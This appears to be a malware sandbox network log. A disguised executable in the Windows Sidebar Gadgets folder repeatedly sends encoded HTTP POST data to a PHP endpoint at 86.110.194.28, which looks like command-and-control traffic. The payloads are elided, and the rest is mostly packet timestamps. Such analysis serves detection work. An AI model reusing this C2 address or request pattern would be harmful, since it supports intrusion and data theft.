                                                                                                                                                                  Jan 3, 2025 09:08:31.899090052 CET5001880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:31.903822899 CET805001886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.254656076 CET5001880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:32.259582996 CET805001886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.259596109 CET805001886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.259604931 CET805001886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.596971989 CET805001886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.727794886 CET805001886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.729566097 CET5001880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:32.845897913 CET5001880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:32.846062899 CET5002780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:32.850882053 CET805001886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.850900888 CET805002786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:32.850960016 CET5001880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:32.850994110 CET5002780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:32.851108074 CET5002780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:32.855901003 CET805002786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:33.207489967 CET5002780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:33.212447882 CET805002786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:33.212462902 CET805002786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:33.212467909 CET805002786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:33.543397903 CET805002786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:33.629285097 CET5002780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:33.681271076 CET805002786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:33.797766924 CET5003380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:42.359052896 CET5009380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:42.363903046 CET805009386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:42.363915920 CET805008786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:42.363982916 CET5008780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:42.364012957 CET5009380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:42.364219904 CET5009380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:42.368932962 CET805009386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:42.752501011 CET5009380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:42.757457018 CET805009386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:42.757467985 CET805009386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:42.757474899 CET805009386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:43.041141987 CET805009386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:43.170034885 CET805009386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:43.170120955 CET5009380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:43.299125910 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:43.303946972 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:43.304022074 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:43.304141998 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:43.308969021 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:43.660664082 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:43.665637970 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:43.665648937 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:43.665656090 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.094134092 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.144933939 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.230086088 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.285548925 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.347289085 CET5009380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.352900028 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.353418112 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.357862949 CET805010086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.357912064 CET5010080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.358293056 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.358366966 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.358479977 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.363291979 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.707519054 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:44.712421894 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.712433100 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:44.712441921 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.052495003 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.098074913 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.186878920 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.238718987 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.311336040 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.311630964 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.316375017 CET805010486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.316387892 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.316436052 CET5010480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.316472054 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.316565990 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.321357012 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.660773039 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:45.665652037 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.665671110 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:45.665679932 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.023468018 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.066833973 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.160890102 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.207441092 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.282682896 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.282978058 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.287827969 CET805010586.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.287844896 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.287878036 CET5010580192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.287918091 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.288162947 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.292969942 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.426887989 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.427159071 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.431971073 CET805010786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.432137012 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.432207108 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.436996937 CET805010786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.479270935 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.546592951 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.551440954 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.551691055 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.551809072 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.556597948 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.782087088 CET805010686.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.783803940 CET5010680192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.785794020 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.790644884 CET805010786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.790721893 CET805010786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.910687923 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:46.915550947 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.915569067 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:46.915576935 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.109169960 CET805010786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.160568953 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.248105049 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.248447895 CET805010786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.301188946 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.301191092 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.381608009 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.426383018 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.503489017 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.503596067 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.503950119 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.508519888 CET805010786.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.508588076 CET5010780192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.508754015 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.508826971 CET805010886.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.508831024 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.508872032 CET5010880192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.508972883 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.513724089 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.863890886 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:47.868766069 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.868884087 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:47.868892908 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:48.200901031 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:48.254452944 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:48.332075119 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:48.379333973 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:48.453918934 CET5011080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:48.454031944 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:48.458785057 CET805011086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:48.458878040 CET5011080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:48.459218025 CET805010986.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:48.459285975 CET5010980192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:48.460347891 CET5011080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:57.860397100 CET805012086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:57.910581112 CET5012080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:57.994900942 CET805012086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.035590887 CET5012080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.083281994 CET5012180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.083422899 CET5012080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.088107109 CET805012186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.088188887 CET5012180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.088395119 CET5012180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.088408947 CET805012086.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.088496923 CET5012080192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.093251944 CET805012186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.125062943 CET5012180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.171283960 CET805012186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.225898981 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.230802059 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.230891943 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.231065035 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.235830069 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.565603018 CET805012186.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.565759897 CET5012180192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.582638025 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:58.587542057 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.587553024 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.587560892 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.934947014 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:58.988950014 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.066900015 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.113995075 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.188313007 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.188626051 CET5012380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.193407059 CET805012286.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.193485022 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.194683075 CET5012380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.194683075 CET5012380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.194684029 CET5012280192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.199522018 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.551453114 CET5012380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:08:59.557039022 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.557049036 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.557059050 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.902986050 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:08:59.957468987 CET5012380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:00.034199953 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:00.082463026 CET5012380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:00.158096075 CET5012480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:00.163021088 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:00.163106918 CET5012480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:00.163208961 CET5012480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:00.167982101 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:00.860773087 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:00.910624027 CET5012480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:04.915224075 CET805012386.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:04.915318012 CET5012380192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:10.868196011 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:10.868366957 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:10.868421078 CET5012480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:20.965403080 CET5012480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:20.965657949 CET5012480192.168.2.486.110.194.28
                                                                                                                                                                  Jan 3, 2025 09:09:20.970314980 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:20.970329046 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:20.970333099 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  Jan 3, 2025 09:09:20.970458031 CET805012486.110.194.28192.168.2.4
                                                                                                                                                                  • 86.110.194.28
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:13.663677931 CET | 375 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 344
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:07:14.020428896 CET | 344 | OUT | Data Raw: (encoded payload)
Jan 3, 2025 09:07:14.375729084 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:14.471868992 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:14 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 1400
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
Jan 3, 2025 09:07:14.471879959 CET | 393 | IN | Data Raw: (encoded payload)
Jan 3, 2025 09:07:14.595175982 CET | 351 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 384
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:14.806215048 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:14.806637049 CET | 384 | OUT | Data Raw: (encoded payload)
Jan 3, 2025 09:07:15.022274971 CET | 324 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:14 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
Jan 3, 2025 09:07:15.029629946 CET | 351 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 384
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:15.240533113 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:15.240725040 CET | 384 | OUT | Data Raw: (encoded payload)
Jan 3, 2025 09:07:15.456553936 CET | 324 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
Jan 3, 2025 09:07:15.457134008 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 1452
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:15.668015957 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:15.668198109 CET | 1452 | OUT
Jan 3, 2025 09:07:16.043838978 CET | 324 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:14.673593998 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:15.019939899 CET | 2576 | OUT
Jan 3, 2025 09:07:15.367511034 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:15.498719931 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:15.907654047 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:07:16.254221916 CET | 2576 | OUT
Jan 3, 2025 09:07:16.602940083 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:16.846651077 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:16 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T
Jan 3, 2025 09:07:16.951261044 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:16 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:19.449095964 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
